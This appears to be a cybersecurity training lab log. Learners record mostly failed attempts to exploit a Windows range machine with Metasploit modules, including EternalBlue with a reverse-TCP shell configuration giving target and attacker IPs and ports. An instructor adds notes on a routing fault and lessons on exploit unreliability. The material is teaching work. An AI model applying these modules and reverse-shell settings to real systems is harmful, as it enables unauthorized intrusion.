Setup Kali Linux VM + Metasploit
Kali Linux VM Download Link: https://www.kali.org/get-kali/
Guide on setting up Metasploit: https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/
Offensive Step Documentation
Attempt 1 BLOCKED: Tried running /windows/fileformat/office_ms17_11882 module but was unsuccessful. Windows Defender identified rtf file as virus.
Attempt 2 FAILED: Tried running windows/browser/chrome_filereader_uaf module but was unsuccessful. Stuck in a loop of sending:
Still unsuccessful even after disabling the sandbox. Likely reason why it doesn't work is that it has been patched on later versions of Chrome.
Attempt 3 BLOCKED: Tried running /windows/fileformat/adobe_geticon module but was unsuccessful. Similar to attempt 1, Windows Defender identified the pdf file as virus.
*Quite a number of exploit modules in Metasploit are old i.e. many years back. These likely won't work because it has been patched. Need to either find one that is recent that works or try to download an older version of the particular application.
References:
Attempt 4: EternalBlue exploit FAILED
From our internal recon, we found out that port 445 is opened on the target machine. This port is needed for EternalBlue to work.
We can see that the target machine IS vulnerable to the EternalBlue after running the scanner module in Metasploit.
Next, I ran the windows/smb/ms17_010_eternalblue module on the target machine. Module was unable to establish a meterpreter/shell session.
Config used:
RHOST = 10.10.10.218 (Target IP)
RPORT = 445
LHOST = 10.10.10.102 (Kali IP)
LPORT = 4444
Payload = windows/x64/shell/reverse_tcp
Reopened msfconsole and retried again. WIN instead of FAIL but yet still no command shell...
Tried interacting with the session but nothing happens...seems that the command shell opened and got closed immediately.
References:
https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/
Attempt 5: BlueKeep_RCE exploit FAILED
Attempt 6: EternalBlue exploit using payload generic/shell_reverse_tcp
Able to get shell now but entering a command causes it to close...
Attempt to upgrade shell to meterpreter failed because the connection got reset...
Attempt 7: EternalBlue exploit using payload generic/shell_bind_tcp
No shell again...
Jym's Comments
Remove Kali from ZeroTier
Upgraded to Meterpreter...
Routing is the root cause of 's problems
So what happened I added 2 routes for me to access Cyber Range directly..
I needed to add Kali into ZT so that YJ can access from remote, but due to the routing that I need, I'd created a problem for him because when the Kali tries to send payloads again, it will end up going to ZT.
I manually took the URL to target to run... but failed. This means something wrong with networking...
Partial Access
NOT using reverse_tcp (generic/shell_bind_tcp see below). I kill my session, you try again. Wait, I try to upgrade to Meterpreter.. failed.
installed a separate Win7 sp1 64bit to test concurrently.. same as initial .218 experience, all FAIL..
Will add a share folder to retest... looks like still refuse to work for the new VM..
Points to experience for learner
- Realise exploit payloads from many of these popular offensive tooling (eg. Metasploit) are mostly NOT viable on Win10
- Compare this experience with your Type 2 Code-Execution attempt, & even Type 1 if there were NO app-control with OpenEDR
- Why would any sane person make his/her life difficult when there are easier way to execute codes?
- Why you selected the exploits you did is because you knew what was inside the VM, what if you don't know?
- Even when the EternalBlue scanner reported as "vulnerable", it may not be reliable.